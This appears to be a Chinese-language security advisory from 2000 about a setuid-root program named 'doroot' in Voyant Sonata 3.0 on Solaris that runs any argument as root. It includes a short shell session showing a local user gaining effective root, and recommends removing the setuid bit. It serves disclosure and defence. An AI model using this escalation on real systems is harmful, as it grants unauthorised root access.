发布日期：2000-12-20
更新日期：2000-12-20

受影响系统：

   Voyant Technologies Sonata 3.0
    + Sun Solaris 2.x

描述：

---

Sonata 是出自 Voyant Technologies 的语音会议交换系统，
它的用户在使用时，root 权限可能会在本地受到侵害。

Sonata 在安装时有一个程序具有 setuid root 属性，这个
程序将把提供给它的参数作为命令来执行。安装后这个程序可
以被所有用户运行。结果是，主机的安全随时会受到恶意用户
的侵害。


<* 来源：Larry W. Cashdollar (lwc@vapid.dhs.org) *>




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ cd /opt/TK/tk4.1/library/demos
$ id
uid=60001(nobody) gid=60001(nobody)
$ ./doroot id
uid=60001(nobody) gid=60001(nobody) euid=0(root)
$ ls -l doroot
-rwsr-xr-x   1 root     other       6224 Mar 12  1999 doroot

建议：

---

临时解决办法：

  NSFOCUS建议您暂时去掉Sonata的setuid 位以减小风险。

厂商补丁：

  暂无


浏览次数：5122
严重程度：0（网友投票）